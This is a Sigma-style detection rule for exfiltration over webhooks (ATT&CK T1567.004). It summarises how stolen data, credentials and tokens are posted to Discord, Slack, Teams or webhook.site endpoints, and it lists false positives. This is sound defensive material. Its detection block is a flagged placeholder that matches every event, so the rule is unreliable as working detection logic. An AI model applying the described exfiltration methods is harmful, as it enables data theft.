title: Exfiltration Over Webhook (T1567.004)
id: df00tech-t1567-004
status: experimental
description: "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack, Microsoft Teams, and generic services like webhook.site. Adversaries exploit these endpoints by either linking an adversary-controlled webhook to a victim-owned SaaS service for automated repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL via scripting tools. Because webhook traffic is HTTPS and destined for widely-trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks for credential and token exfiltration from malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused via SQL Server xp_cmdshell lateral movement chains."
references:
  - https://attack.mitre.org/techniques/T1567/004/
  - https://df00tech.com/detections/T1567.004
author: df00tech
date: 2026/04/21
tags:
  - attack.t1567.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate DevOps and CI/CD pipelines posting build status notifications to Slack or Teams webhooks via scripts or pipeline agents
  - "IT monitoring and alerting tools (PagerDuty integrations, Grafana alerting, custom scripts) sending operational alerts to collaboration webhooks"
  - "Developer workstations testing webhook integrations during application development, especially when using webhook.site or requestbin as debug targets"
  - Authorized security tools performing phishing simulations or red team exercises that post results to team notification webhooks
  - "Business automation scripts (Zapier alternatives, custom workflow tools) that legitimately transfer structured data to webhooks"
level: high